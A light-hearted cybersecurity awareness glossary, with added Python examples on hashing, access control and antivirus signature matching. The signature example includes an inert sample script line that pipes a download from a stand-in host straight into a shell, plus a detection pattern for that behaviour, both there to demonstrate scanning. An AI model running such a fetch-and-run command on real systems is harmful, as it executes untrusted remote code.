The digital eyes inside Maslow’s hierarchy
It is the application or use of technology to store, retrieve, transmit, and work with data (information). It’s typically applied within the business world, but has its modern origins firmly rooted in the mid-1940s when the first programmable digital electronic computer (Colossus) was designed and used for deciphering enemy encryption. Since then, information technology has infiltrated almost every facet of modern life as we strive to store more, read more, and share more, faster and faster with each passing year.
The origins of our digital world...
A risk that originates from inside. It doesn’t have to be an employee, and it is often overlooked as a potential issue within many organizations. Historically we called this an “inside job,” and history is littered with examples of banks being robbed by their own managers etc.
The digital rotten apple
If a human has integrity, there’s a level of trust based on a number of elements. If a system has integrity, then it’s doing what it’s meant to be doing. However, when that system loses integrity, it can lie to you and give you bad information, take your data, or simply shut up shop, go on strike, and never be seen again... Think of data also having the same properties. If you read something, do you believe it? What’s the source, does it have integrity, did integrity break along the way, OR can you trust it? This is the next evolution of security, safety, and the battle we are in.
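The hash and integrity entries above describe the same mechanism from two sides: a fixed-length fingerprint that changes completely when the input changes, and a check that tells you whether data is still what it was when you recorded it. This is an added example, not part of the Wizernary; the “patient record” bytes and the recorded digest are constructed for the demo.

```python
import hashlib
import hmac
from typing import Iterable

def sha256_hex(data: bytes) -> str:
    """One-shot hash: any amount of input -> 64 hex characters (256 bits)."""
    return hashlib.sha256(data).hexdigest()

def sha256_stream(chunks: Iterable[bytes]) -> str:
    """Same digest as sha256_hex(b''.join(chunks)), but fed piece by piece.
    This is how you hash an entire hard drive image without loading it all
    into memory: read a block, update, repeat."""
    h = hashlib.sha256()
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()

def integrity_ok(data: bytes, known_good_hex: str) -> bool:
    """Forensic-style check: does the evidence still match the digest that was
    written down when it was collected? compare_digest runs in constant time,
    so an attacker cannot learn how many leading characters matched."""
    return hmac.compare_digest(sha256_hex(data), known_good_hex.lower())

def demo() -> dict:
    # Constructed sample "file" contents, not real patient data.
    original = b"Patient record 42: blood type O+, allergic to penicillin\n"
    # This is what you'd record in the chain-of-custody log at collection time.
    recorded = sha256_hex(original)
    # Someone changes a single character: O+ becomes O-.
    tampered = original.replace(b"O+", b"O-")
    return {
        "recorded": recorded,
        "tampered_digest": sha256_hex(tampered),
        "original_passes": integrity_ok(original, recorded),
        "tampered_passes": integrity_ok(tampered, recorded),
        # Hashing in 16-byte blocks gives the identical fingerprint.
        "stream_matches": sha256_stream(
            original[i:i + 16] for i in range(0, len(original), 16)
        ) == recorded,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```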
Internet of Things (IoT)
This has become the collective noun for everything that has a microchip in it that’s connected to a network. From the toothbrush that talks to your phone, to the fridge and microwave arguing with the doorbell… It is the billions of devices we are surrounded with that are apparently meant to make our lives easier and free up time. From your home, your vehicle, place of business, and everything in between, we interconnect these devices in the hopes they help us.
It’s Skynet before gaining consciousness.
Internet Protocol (IP) Address
If you look at an IP address, it’s often 4 sets of numbers separated by a “.” Each block has a meaning, and each part of that block will help speed your digital message, mail, or YouTube video to and from the right place (most of the time… like the post office, sometimes it DOES go pear shaped). We have two different types of addresses, but for all intents and purposes, they do the same thing… they help work out where to send your digital life.
Your digital street address on the Internet
Intrusion Detection System (IDS)
Think of this as the “jobsworth” guard. It does what’s asked of it… it detects and reports BUT does nothing else, and depending upon how it’s been trained (configuration being key), it might over-alert like a well-caffeinated Duracell bunny, at which point it gets ignored (shepherd crying wolf too often, anyone?) OR it might simply sit there and watch the content of your enterprise get lugged out the front door. Sometimes, it even holds the door open FOR the adversaries. It’s all down to how and what you’ve told it to do… nothing more, nothing less. Don’t expect too much from it; it’s one step above a firewall but still as dumb as a box of rocks.
I think therefore I am… going to just write a TPS report about it.
Intrusion Prevention System (IPS)
Think of this as the Yin to the IDS’s Yang… they are often bundled together, as each alone is kinda useless, but together they CAN work well OR they can be like Tweedledee and Tweedledum and give the adversary a right laugh as they saunter past them en route to rummaging around your entire enterprise. As with the IDS, it’s all about continual training and configuration, which, unfortunately, is something that many folks in our industry forget about.
A digital trapdoor, great sometimes... BUT Indiana Jones can still get past IF determined.
It’s the glue that holds YOUR Internet experience together.
Community Submission from Loannis Samantouros:
Those “public” USB charging ports you see at the airport, the coffee shop, the rental car place, etc.? They’re not always as innocent and as friendly as they seem. The ability to take your data from you through the charging port or the very cable itself is, unfortunately, a very real and simple attack vector that’s used to separate you from your data. Serially transmitted diseases are a problem, only plug in to your own charger or use a USB condom.
Just because it’s free, doesn’t mean it’s safe.
It’s THE computer program that’s at the core of the operating system you use. It talks to the hardware, the memory, the keyboard, and then takes those conversations and discusses them with the operating system and applications you use. Think of it as the broker between you mashing that keyboard and the letters appearing on the screen… there’s something REALLY complex that has to happen, and the kernel makes sure that it does.
Digital Gandalf or Mercury (winged messenger)
These are programs that watch what you type. They sandwich themselves in the digital world between your keyboard and the operating system, or on a mobile device they often hide RIGHT in front of you as a “cover” for your keyboard (it looks just like your normal keyboard on your phone). Their job is to simply record everything you type (mistakes and all) on the keyboard. They are logging passwords, messages, notes, where you go on the Internet, and who you’re talking with. That data is then sent to whomever installed the program on your machine. Oftentimes, they do this without you knowing about it. They’re sneaky, malicious, and often go undetected for a long time.
Remember the Yellow Pages advert “Let your fingers do the walking?” A keylogging program would be the one watching those fingers walk EVERYWHERE…
It’s the unwanted digital assistant watching your every move.
Leet Speak (l337)
These days, more often than not, it’s someone who drank too much of their own Kool-Aid or hasn’t found their way out of the bulletin boards (our digital meeting places before we had Myspace, Facebook, etc.).
It’s a form of substitution using characters, numbers, and other things to substitute the alphabet within a word. (Hacker becomes h4x0r, etc.)
1t's 4ll gr33k t0 m3 (It’s all Greek to me…)
Sometimes, you can use a key to open the door. (or a sledgehammer) Those are physical access controls… Logical controls would be something that identifies “you” as you, and not just the “you” with the key… Biometrics, passwords, retinal scanners, or other methods, are used to best identify that the “you” in front of the door IS really you and not ME trying to be you. You get the idea or are “you” as confused as me now?
The fingerprint is mightier than the sledgehammer…
Long Lost Uncle
See Scam. Your uncle never was lost in the jungle, nor did he leave a fortune in the bank, nor does that person at the other end of the email OR phone call REALLY care about you. Hang up and never answer the message. Please.
Media Access Control (MAC) Address
A unique code given to every single network interface controller ever made. This is the physical part of the puzzle that allows systems to find and talk with each other in the digital world.
Your physical street address on the Internet.
See Artificial Intelligence. Just slightly dumber than Clippy.
Any program that is intentionally designed to cause harm. It’s a collective term that shelters viruses, trojans, worms, ransomware, spyware, adware, etc. Often folks have accused Microsoft of being malware, sometimes with considerable merit to the argument.
The digital hand grenade
When you used to take a picture (back in the old days), if you wanted to know what it was, which great aunt was in the shot, or when it was taken, you had to scribble notes on the back AFTER you got them from the developers. These days, that job is handled by the metadata. Whether we like it or not, there’s metadata ALL around us. This document I’m typing into has it (date, author, file location, version, owner, content, statistics). We call that the properties. Your images have metadata: the location (if you have it turned on), file size, and a heap of other little snippets of information ABOUT the information.
It's the data's data.
Millions in the Bank
See Scam. Even if I do have cancer or I’m terminally ill, I’m not leaving my fortune to you, a total stranger whom I’ve just met on the Internet. Seriously, if I have millions in the bank, the relatives will be crowding round me like a pack of vultures and you, my Internet friend will see nothing but an IOU. So run, and run now... and never answer that email. Please.
(Sent in by Rachel Arnold)
Throughout history each era has had its helpers. The unsung heroes or heroines that gladly follow the main character of the plot through thick and thin, often carrying the luggage or cleaning up after whatever skirmish just happened. They can be found clutching bottomless bags filled with weapons, pulling handy levers upon request, or robbing the cemetery for another spare set of limbs for the latest creation. In our digital realm, these are the minions, the carriers of antenna, the first one over the barbed wire fence, the ones to both find AND fetch the Starbucks, or the ones coding the exploit at 3am while the head geek’s taking 40 winks on the sofa.
The unsung underlings
National Institute of Standards and Technology (NIST)
Somewhere in a building, hidden in a room, buried in a filing cabinet, hidden behind a wall, there’s probably a standard for how to describe NIST, let alone a set of standards and measurements for how to actually build this compendium… Welcome to NIST. I always think of it as that “room” where people are just “thinking shit up” (to quote Bruce in Armageddon). They’ve done a lot for the technology arena in bringing a well-defined level of standards and methodologies to the table; now all we have to do is work out how to get folks to pay attention.
Our physical measuring tape in a digital world
National Security Agency (NSA)
The National Security Agency started life just before the USA entered the FIRST World War (April 1917); back then it was the Cable and Telegraph Section. It had a rocky and somewhat patchy existence (including in 1929, when it was shut down because “Gentlemen do not read each other’s mail”) until November 4th, 1952, when the Armed Forces Security Agency was renamed the NSA. The agency these days is considered a center of excellence for cryptanalytic research and other matters pertaining to surveillance in both the physical and digital domains. Oh, and yes, nowadays they DO read the emails IF they’ve got the time…
No Such Agency (Once upon a time its existence WAS classified, and you couldn’t buy souvenir mugs or shirts!)
The digital highway is what we used to call it, then it got faster, and we called it the information superhighway. Once we got bonded T1’s and fiber, we moved to the WORLD wide web, and on from there. We lost the highway idea around the 90’s BUT it’s still a good reference point to describe what a network is. Information travels, is rarely static (like humans), and it uses transport to move (as we do) so the road system works to describe what a network is. Heck, it even mimics real life with regards to seasons. Your favorite sites slow down around the holidays because of the volume of traffic…just the same as the roads clog up as you get closer to the shopping mall etc.
The digital autobahn
Just as you need (or should have) a license to drive in some places, the same analogy is true of computer access. To be allowed to connect, talk, and interact with systems on the network, you have to have a license. These are often issued to make sure the system is safe, secure, managed, sorted out, AND isn’t going to go driving the wrong way down the Information Superhighway…
Your digital driver’s license
Network Access Control (NAC)
NAC is the enforcer or the toll booth operator that’s checking to make sure that you have the right license, for the right place, right time, AND that it’s valid, etc. IF you’re out of luck and something is wrong, you can expect to be sent to the eternal on-ramp until someone comes along and sorts you out. (Ok, I promise that’s the last of the car/highway analogies for now!)
The toll booth operator with a grudge...
See Scam. Nigeria is a republic, ruled by a democratically elected president, so no prince here.
Nigeria is also a federation of 36 states, so no central prince, however, there ARE parts of the country that still maintain a tribal or ethnic view that a person can be chosen to represent their community or town, however their jurisdiction is limited, and the chances of them having a few million in the bank JUST to send to you is so far from reality we’ve not even discovered the science to find it. So, don’t respond, ever. Please.
Imagine sitting in the middle of the most crowded street in your area. You are painting or writing a book and EVERYONE can come and look at it, watch you work, and eventually provide feedback to you. They can also use your writing or picture for their own use or simply take it and change it. (Salvador Dali style if they so choose…) In the digital world, this is open-source software. You get to build things and then put them out there for others to use, study, or change if they so feel inclined. What it means is you potentially have an amazingly diverse set of eyes and keyboards looking at your work.
The logic behind open source is collaboration and cooperation. When it comes to software code, we ALL make mistakes (lots of them sometimes), so the more eyeballs that are on the code, the theory goes, the better the chance that the code has fewer mistakes in it.
Many hands (hopefully) make light work…
Open Systems Interconnect (OSI)
Usually referenced as the OSI Model, it’s how we describe how things talk and interact with each other across both the physical and digital realms. The model takes into consideration every step of the way, from you pushing a button (or yelling at the phone), through the application, the operating system, the stuff that actually moves your message, through to the systems that perform all those functions. Think of it as a route map that all systems use to find their way around both realms as they try to work out what the heck TO DO with that instruction you gave them. It’s also the reference guide that we use when building new applications or systems. Like a basic plan for building a house, you know you need some fundamental things to make it work; the OSI Model is that set of guides.
How do computers shake hands?
Operational Technology (OT)
Closely related to the Industrial Control Systems definition (ICS), this is the hardware and software that is used to detect and manage the physical industrial control processes, devices, and infrastructure. It’s the device that measures temperature or the flow of water in a pipe, the widget that checks to see if the valve is on or off and tells it what to do next. All of these and 1,001 other such things are the actual pieces of physical technology that keep the world ticking.
It might be simpler to explain what a password should NOT be, than what it is! Anyone using 123456, 111111, 123456789, etc. is doing nothing more than providing a quick fence hop into their data and rarely would any of us consider it a password. IF, however we break down what it IS, we arrive at the simple fact that it’s a word, phrase, string of characters or something similar that must be regurgitated to gain access to whatever you are looking to get into. More often than not it’s found on a Post-It-Note attached to the computer, or under the keyboard, however we DO encourage people to store them in nice, comfortable, warm and safe things like password vaults or managers…
The simplest secret that allows you into the digital world...
This is the process, the policy, and the control that helps manage ALL those patches across ALL those vendors and systems that you have, think you have, thought you’d gotten rid of in the cloud, AND the ones you just found behind the cabinet. Now, some of those systems no longer can be patched, or the companies have gone out of business, OR quite simply, the cost of maintenance prices you out of being able TO patch them. So then, patch management takes on the supporting role of helping you to identify risks and gaps in your environment. It’s an often-overlooked part of IT/InfoSec support and typically doesn’t get the attention necessary for folks to be able to make a decent job OF it. We often forget that the very systems we’ve purchased are still being worked on, developed, updated, and in many cases patching is a constant cyclical process that has to happen to maintain integrity…just like your socks, proper maintenance and support is critical.
The process by which your holey socks are identified AND fixed…
Remember the days when you used to darn a sock or sew a patch onto that pair of trousers? This is the digital version. Software, systems, and everything we make in the electronic and digital world has bugs or errors in it. Sometimes those errors only come to light (or are found) when you and I are mashing away on the keyboard in a manner NO tester or programmer ever thought possible OR we worked out how to hold down ALL the keys at once just to see what happens. The program breaks. (just as your clothing tears or wears a hole etc.) Patching is simply another piece of software that is laid over the top of (and sometimes replaces) some of the code that you already have. Repairing the hole, the error, or the bug, and allowing you and I to get back to doing things they never thought possible.
The digital equivalent of darning your socks…
Payment Card Information (PCI)
The PCI requirements are a set of standards and guidelines that folks who handle YOUR credit card are meant to adhere to. The standards cover all aspects of how someone takes, holds, stores, moves, and processes the data that’s on YOUR credit card. The logic FOR the standards is to try and cut down on credit card fraud by making it harder for adversaries or criminals to steal the information when YOU hand it over to other people. (For those folks who don’t know, that black stripe on the back of your credit/debit card holds a LOT of very personal data that is used for validating both you and the card AND can be used to re-create/steal the card for criminal purposes.)
Compliance is NOT security, ‘nuff said
Penetration Testing (Nice Version)
Think of it as the digital equivalent of a friendly break in where the burglar leaves helpful notes ALL over the house reminding you to lock your doors, to turn on the cameras, not to leave the keys for the cars on the shelf, and that you should really change the combination to the safe. You get all the lessons, you have all the information at your fingertips to help you improve and make changes, AND you have the logic as to “why” to do this. Testing and assessing done in collaborative settings can help all parties learn about themselves in a manner that’s controlled, safe and educational.
Realism without the lawyers and headaches
Penetration Testing (The Rant)
If approached incorrectly, it can be an outdated and outmoded method of shaming a company into paying more money for blinky shit that they don’t need. IF done right (and there’s only a few places that are good), it can be a collaborative, cooperative experience where both parties benefit.
Penetration testing puppy mill, a company that employs cheap bodies, gives them crappy tools and then rebrands Nessus reports as “assessments” and charges for the pleasure. (See Scams)
Even within our own industry, we can’t agree what a penetration test is, or what a scan or an assessment is, therefore I’m not even going to attempt to do it. Suffice to say, when someone wants to “test” you, make sure you know what you’re getting into, what questions to ask, and expectations to have, AND make sure it’s a reputable company that WILL take the time to educate you, help you improve, and isn’t in it for just the money.
You’re naked, and they have 50 gallons of lube and rubber gloves.
Personally Identifiable Information (PII)
It’s YOUR information that is stored and identifies YOU. Your full name, address, social security number (National Insurance Number for folks NOT in the USA), your passport, driver’s license, bank, or other numbers or information that point the large digital finger in YOUR direction. Many states are now passing laws to better protect how that data is handled by the very companies you hand it to and what to do (whom to notify, apologize to, etc.) when they eventually lose it.
The catalog of who YOU are...
We all recognize it when it’s pointed out, yet, many of us still fall for the digital confidence trickster that masquerades as a trusted entity. The lawyer claiming to represent your long lost, deceased uncle who left you millions, or the dying elderly lady who wants to give you all her money because you’re kind, or the banker in some far flung country who’s willing to share the entire content of the safe with you IF you’ll split it with them AND if you’ll send them some money so they can send you LOTS more… Don’t fall for these OR any of the other scams PLEASE!
Fool me once, shame on you, click it twice, shame on me...Digital confidence trickster...
A form of active wiretapping, typically done (a long time ago) when we would sneak into a connection while it wasn’t active (between conversations) and actively get “between the lines” to listen in on conversations, monitor status, and other things. In networking terms piggybacking was also used when sending an acknowledgement packet WITH the response/data packet at the same time (as one packet, thereby saving bandwidth).
In the physical world it’s when someone follows you into a building OR you are civilized and open the door FOR them, often without asking them to badge in, provide identification, etc. It’s a social engineering attack that targets human courtesy, often called tailgating.
Leaving your computer for two minutes to go get that cuppa coffee? Thanks, I’m going to wait for you to leave, sit down AT your desk (because you didn’t lock your computer) and piggyback on your access to do what I want/need to do while I’m in the building and guess who takes the blame?
Bad Internet? Terrible connection from one side of the house or building… wait! Your neighbor’s got open wireless, where’s the harm in piggybacking off their signal? (Although this is iffy given the idiots at Xfinity/Comcast openly LEAVE a named WiFi account “open” on YOUR network for anyone who’s THEIR customer to use…)
Sneaking in UNDER the radar…
Good old standard text that hasn’t been scrambled... the stuff you are reading right now is plain text. You can (hopefully) make sense of it AND it’s legible! Now, while it’s going between you and I, it might get scrambled (that “S” in HTTPS means the information has some mathematical wizardry applied to it); however, IF everything is working right, you should be able to sit down and read it in the same way you do the newspaper or your favorite book.
The part of the digital conversation you can understand
Think of them as additional digital Lego pieces that you can add to your existing system. You want larger Lego wheels, then you CAN have them. (a custom browser plugin that runs videos) You want tinted Lego windows, install the plugin FROM the distributors site (NOT a 3rd party location) and you’ve got them.
We’ve covered the IP address elsewhere in this compendium, so now we’ve arrived AT the destination, we have to work out how we’re getting into the darn place. This is where ports come in. Think of them as all the various ways INTO your target address; they are the doors, windows, chimney, and coal holes of the digital world. In the digital house, there’s 65,535 ways in though, ranging from the normal (80/443, HTTP/HTTPS, your web browser) to email on 110/995/143/993 (POP3/IMAP) through to the obscure (32887/Ace of Spades) or the more infamous Back Orifice on 31337.
65,535 front doors into your house…
The digital version of being evicted and locked out of your digital life. It’s a type of computer program that, once it has access to your systems, can/may and often will encrypt the data and the drives, and then take a copy, leaving you with a ransom note and a limited amount of time to pay up or suffer the consequences. It is simply there to harvest money from people, companies, and systems that are especially vulnerable or not well maintained. It is an escalation of simply infecting your system and seeing IF you can recover.
The digital gun to your head
You know that digital picture puzzle or jumbled mess that tries to get you to prove you’re a human? That’s reCAPTCHA. Find the buses, then the fire hydrants, how about the crosswalks, bikes, boats, and traffic lights? If text and numbers are involved, you may think Picasso was behind the whole thing as your brain tries to unscramble the mess in front of you. We’d prefer a simple “Click here if you’re not a robot.” Unfortunately, programmers and scammers are a little more cunning than that these days!
Remember the sliding puzzle? This is its revenge…
Once upon a time, we had one computer. It was in a room. To use the computer, you went INTO the room. To do anything TO the computer, you went INTO the room. Heck, to even know there WAS a computer you had to find the room… THEN, progress happened and the computer went into every room in almost every house, car, office, factory, doorway, and pocket in the land. The problem then became one of how do folks that need to fix the computers get TO them? Welcome to remote access...the ability to sit at one computer and appear as if you are working at a different one half way round the globe. Nowadays, we use remote access for all sorts of things; doorbell cameras, remote support, telesurgery (remote control of the things operating on you), among a host of other applications.
It’s NOT always your hands on YOUR keyboard…
Risk
Everything we do involves risk. Driving down the road, there’s the potential (risk) of having an accident. Getting on the Internet, you always have the risk of compromise. We try to do many things to reduce risks around us. Following the rules of the road, watching out for people not paying attention, and making sure our cars are in good running order are some examples in the real world. The digital version of this would be paying attention and thinking before clicking, keeping your system updated, and having some basic protections in place. Really, it’s a matter of knowing, understanding, AND being aware of your surroundings. This is true in both the physical and digital realms. Within companies, there are business risks, financial, material, manufacturing, human, and technical risks. Within IT and InfoSec, it’s our role to help folks understand and reduce those risks wherever possible.
Death, taxes, and risk, the three constants of life
Rootkit
Welcome to an adversary’s (attacker’s, bad person’s) digital toolbox. The word comes from two familiar ones being smashed together: Root (the “GOD” mode in computing terms) and Kit (exactly what it is). It’s the Swiss Army knife of the attacker, albeit in digital or code format. The idea is to be able to sneak into your system, drop my rootkit into your operating system and then be able to have all sorts of ways in, out and around without you knowing. I might have ways past your antivirus, or endpoint detection, ways to steal your keystrokes, watch your camera, or harvest your accounts, all with stealth AND be able to package the data up and send it out without you even knowing I’m there.
Adversarial Swiss Army knife…
Router
You remember the days when the police used to stand in the crossroad directing traffic while standing on the podium? (Italy and India still have them…) That’s your router. The router’s main job is to take traffic and move it to the right place, sometimes also doing checks, inspections, and other things as it’s moving those packets.
Many of us have routers connecting our homes to the Internet (that box the cable provider gives you, that’s your router). It takes home traffic and moves it along to the Internet, often directing it along the way towards the right things you’re looking for.
It’s a little smarter than a bridge, repeater, hub, or a switch, or other devices you might find in a network as you can give it instructions rather than just hoping things go from point A-B.
Smarter than your average CAU
Rules (or Roles) Based Access Control (RBAC)
Simply put, these are sets of rules and regulations around objects. It might be data, it might be a computer, or a building, heck we can apply rules and roles to the very toaster you have at home. IF we use Talkie the Toaster as our example, the household might only be allowed to toast things between 0600-0800 because after that it’s too loud OR scares the dog. Oh, and you can only use the toaster IF you’re wearing blue socks. Welcome to rules-based… Now, if Grandma comes to stay, then all bets are off, she can toast whenever she wants AND she’s allowed to toast muffins! Welcome to roles-based controls. Take these very same ideas and apply them to data and systems. (preferably without toasting the floppy disk!)
The right people, from the right place, at the right time ONLY
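The toaster analogy above, turned into a small deny-by-default policy evaluator. This is an added example, not anything from the original page: the household rules (toasting hours, blue socks), the roles (household, grandma) and the subjects are all constructed for illustration, and it shows why rules look at the request while roles look at the requester.

```python
"""Rules-based vs roles-based access control, using the page's Talkie the Toaster
analogy. Added example; the toaster, rules, roles and subjects are constructed
for illustration and are not taken from any real RBAC product."""
from dataclasses import dataclass, field
from datetime import time
from typing import Tuple

# Roles-based part: a role is a named bundle of permissions on the object.
ROLE_PERMISSIONS = {
    "household": {"toast:bread"},
    "grandma": {"toast:bread", "toast:muffin"},
}

# Who holds which role. Unknown subjects hold nothing (deny by default).
ROLE_ASSIGNMENTS = {
    "alice": {"household"},
    "bob": {"household"},
    "grandma": {"grandma"},
}

# Roles exempt from the household rules ("all bets are off" when Grandma visits).
RULE_EXEMPT_ROLES = {"grandma"}


@dataclass
class Request:
    subject: str
    action: str          # e.g. "toast:bread"
    at: time             # wall-clock time of the request
    attributes: dict = field(default_factory=dict)  # e.g. {"socks": "blue"}


def rules_allow(req: Request) -> Tuple[bool, str]:
    """Rules-based controls look at the request's attributes, not at who is asking."""
    if not time(6, 0) <= req.at < time(8, 0):
        return False, "outside toasting hours 06:00-08:00"
    if req.attributes.get("socks") != "blue":
        return False, "blue socks required"
    return True, "rules satisfied"


def roles_allow(req: Request) -> Tuple[bool, str]:
    """Roles-based controls look at who is asking and what their roles permit."""
    roles = ROLE_ASSIGNMENTS.get(req.subject, set())
    permitted = set().union(*(ROLE_PERMISSIONS.get(r, set()) for r in roles))
    if req.action in permitted:
        return True, f"permitted via role(s) {sorted(roles)}"
    return False, f"no role of {req.subject!r} grants {req.action!r}"


def authorize(req: Request) -> Tuple[bool, str]:
    """A role must grant the action; unless that role is rule-exempt, the
    household rules must also pass. Anything not explicitly allowed is denied."""
    ok, why = roles_allow(req)
    if not ok:
        return False, why
    if ROLE_ASSIGNMENTS.get(req.subject, set()) & RULE_EXEMPT_ROLES:
        return True, why + " (rule-exempt role)"
    ok, rule_why = rules_allow(req)
    return ok, f"{why}; {rule_why}"


if __name__ == "__main__":
    for r in [
        Request("alice", "toast:bread", time(7, 0), {"socks": "blue"}),
        Request("alice", "toast:bread", time(9, 0), {"socks": "blue"}),
        Request("bob", "toast:muffin", time(7, 0), {"socks": "blue"}),
        Request("grandma", "toast:muffin", time(22, 30), {"socks": "red"}),
        Request("mallory", "toast:bread", time(7, 0), {"socks": "blue"}),
    ]:
        print(r.subject, r.action, r.at, "->", authorize(r))
```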
Sandbox
It’s a controlled digital testing environment, mimicking the real systems around you, that is often isolated FROM everything around it so you can play, explore, and experiment to your heart’s content without damaging anything. Often you can find companies testing email attachments, suspect files, and other oddities they’ve found on the Internet OR dragged in through email, etc.
(You sometimes don’t know if a file has a virus until you can run it and you NEVER want to do that in anything that’s connected to the rest of the world…)
Somewhere to test a digital controlled explosion...Your digital padded cell
Scam
The world of fraud and the tricksters themselves have found the Internet... and with it, they can scheme and scam tens, hundreds, and thousands of people at once. Where before, they were the street hustler, peddler, or petty criminal, they can now, with the aid of a computer and some simple programs, trick targeted groups of people in ever increasingly innovative ways.
There is no pot of gold at the end of the rainbow, the cake is a lie, the check is not in the post, you are NOT a winner, and no, you’re not getting your long-lost uncle's inheritance from outer Mongolia IF you just pay a little something up front.
1001 digital ways to part you from your money
Script
A set of instructions in a chosen computer language that reads like a regular to-do list. Think of it as a set of commands that the computer understands (and often we can still read).
Digital to-do list for the computer
Secure Socket Layer (SSL)
This is the older way that we used to communicate securely. The data was encrypted/scrambled in a way where only the sender and recipient understood the instructions. It was the primary way to make sure what you typed into your web browser was only seen by you and whomever you were talking with, buying something from, or selling to (or many other uses to make sure that data wasn’t sent “in the clear” (not encrypted)). It’s now been superseded by Transport Layer Security as a more robust and secure way to send data.
Our digital carrier pigeon WITH a padlock…
Security Awareness
This is where the proverbial rubber meets the road. This is where we have to take what we know about the state of the digital union (and it’s not good) and somehow describe it in terms that everyone else can understand. This is ALL about how WE take what we know and drop it into your noggin. Awareness in its natural state is being conscious of something...to perceive, be aware of, feel, or become cognizant of the ONE simple fact. YOU, in the digital world, are nothing more than a walking chicken McNugget for everyone else unless you wise up, learn some of the basics, and start to defend yourself AND others around you.
Instead of taking up Yoga or Tai-Chi, first take up the digital equivalent. You’ll find it much more rewarding AND I promise you that your future self will appreciate the reduction in stress, ALL without having to bend your left leg around your right ear…
Think before you click! Oh and by the way, we have our own Security Awareness Training!
It’s the checkpoint, you know, the one where you wait in line while someone looks at you, then at your picture in their database… if there’s a match and it’s got notes in red, then you’re going to be spending a LONG time explaining why in a small room. IF not, then you get to go on with your journey in (mostly) peace and quiet. The upside is the matching happens quickly. The downside is a quickly applied “digital moustache” or “digital hair coloring” changes your identity enough so you slip through the net. In the antivirus or endpoint world, this is unfortunately one of the challenges many folks face. We just can’t keep up with the ever-changing landscape and must work out different methods for identifying you and your fake facial hair and dyed wig…
A digital border guard, good but not infallible
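The border-guard checkpoint above in code, as an added example that is not part of the original page: an exact-hash signature next to a behaviour-style pattern signature, run over constructed sample files. The suspect file, its one-byte "digital moustache" variant, the signature names and the database are all made up for illustration; nothing here is real malware or a real antivirus signature.

```python
"""Signature matching, as in the border-guard analogy. Added example: the
'suspect' file, its disguised copy, the signature names and the database are all
constructed for illustration; none of it is real malware or a real AV signature."""
import hashlib
import re
from typing import Optional

# Constructed sample files: an inert stand-in for a suspect script, the same file
# with one byte changed (the "digital moustache"), and a harmless file.
SUSPECT = b"#!/bin/sh\n# demo sample\ncurl http://example.invalid/drop | sh\n"
DISGUISED = SUSPECT.replace(b"# demo sample", b"# demo sampl3")
HARMLESS = b"#!/bin/sh\necho 'hello world'\n"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Signature database. An exact hash names one specific file; a pattern signature
# describes a behaviour (here: piping a download straight into a shell).
HASH_SIGNATURES = {sha256(SUSPECT): "Demo.Downloader.A"}
PATTERN_SIGNATURES = {
    "Demo.PipeToShell": re.compile(rb"curl\s+\S+\s*\|\s*sh\b"),
}


def match_hash(data: bytes) -> Optional[str]:
    """Exact match: fast and precise, but any change to the file breaks it."""
    return HASH_SIGNATURES.get(sha256(data))


def match_pattern(data: bytes) -> Optional[str]:
    """Pattern match: survives cosmetic edits, at the cost of some false positives."""
    for name, rx in PATTERN_SIGNATURES.items():
        if rx.search(data):
            return name
    return None


def scan(data: bytes) -> dict:
    """Run both checks so you can see where each one succeeds and where it fails."""
    return {"hash": match_hash(data), "pattern": match_pattern(data)}


if __name__ == "__main__":
    for label, blob in [("suspect", SUSPECT), ("disguised", DISGUISED), ("harmless", HARMLESS)]:
        print(f"{label:10s} {scan(blob)}")
```

The disguised copy slips past the hash check but not the pattern check, which is why endpoint products layer several matching methods rather than relying on exact hashes alone.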
Social Engineering Attack
The art of using deception, manipulation and other tactics against targeted individuals in order to gain information, trust, or to simply get them to perform certain actions on your behalf. It relies heavily on human interaction and often involves tricking or confusing individuals into deviating from standard practices in order to allow the attacker to gain legitimate, authorized access to systems or information.
The art of human manipulation
Software
While we talked about scripts above being a set of instructions, we tend to think of software as being a whole collection of those instructions (sometimes we’re talking Tolstoy’s War and Peace scale instructions) to enable someone to work on the computer OR for the computer to simply function. Your operating system is considered software (unless it’s Unix in which case it’s considered an unfathomable jumble of madness). Your web browser is another software package (again, unless it’s Exploder or Chrome, in which case some would consider it malware or spyware). It’s the software that allows us to interact with the very silicon systems all around us.
Our interface into the digital realm
Software as a Service (SAAS)
Remember when you used to go and buy your software in a box? It came on a CD or floppy disk (yea, some of us are that old). Well, this is the antithesis of that scenario. Many of us experience this new way of working through our subscriptions to music streaming services or movie systems. SaaS is simply a way to rent you something for a defined period. You want an email server, then go buy the software, hardware, operating systems, and associated stuff, AND a couple of folks to run it OR for $9.99 a month you can rent (SaaS) a fully functional mailbox WITH all sorts of support from the main protagonists out there. Same with all sorts of things (sales tracking, project management, etc.)
The age of rent vs. own comes to the digital era.
Spyware
Life was simpler in the old days... you had someone in the bushes watching the house with a good set of binoculars, you knew there were bugs in the lights, behind the paintings, and under the table… we miss those days of simple spying. Nowadays, we have software that sits, hiding on your systems, watching your keystrokes, taking pictures of your screen, or simply watching and listening for whatever it’s looking for. It can also be listening to your voice (or the keyboard movements) as well as anything else in the house or office that takes its fancy… all without us often knowing it’s happening.
Our unwanted digital shadow
Steganography
The art of hiding in plain sight through the use of picture, video, or music files with hidden messages concealed within. Think of this as those nested Russian dolls. What you SEE is a single, large, well-manicured doll…what’s hidden are several others inside, often with their own messages, agendas, or specific artwork. The practice goes back at least 1,500 years and is often forgotten in pursuit of cryptography (talked about elsewhere here…) Embedding (hiding) a file within a file…
There's more to the Mona Lisa than meets the EYE...
Stuxnet
A very targeted piece of software that was specifically written to attack Siemens equipment (and the associated Windows based industrial control software) that was running various tasks within the critical infrastructure industry (power, heating, light, and in the case of Iran a critical piece of their nuclear program). The software program was successful in its task of infiltration and destruction, however there’s much debate over the overall effect it had ON the very program it targeted in Iran. Over the years, there’s been much speculation and conjecture as to whose hands were on the keyboard and what their motivations were for releasing it.
Overclocking a centrifuge is a lot more complicated than it sounds…
(Thanks Ioannis Samantouros)
Technical Debt
You know when you cut corners with that piece of code, or that new walkway, or anything where speed is prioritized over doing it right… Welcome to technical debt. We’ve called it other things over the years, but the basic premise is you ALWAYS have to pay the piper. There’s never an escape (unless you sell the company at which point it becomes someone else’s problem…welcome to the issues of IoT!)
Digital short cuts coming back to bite…
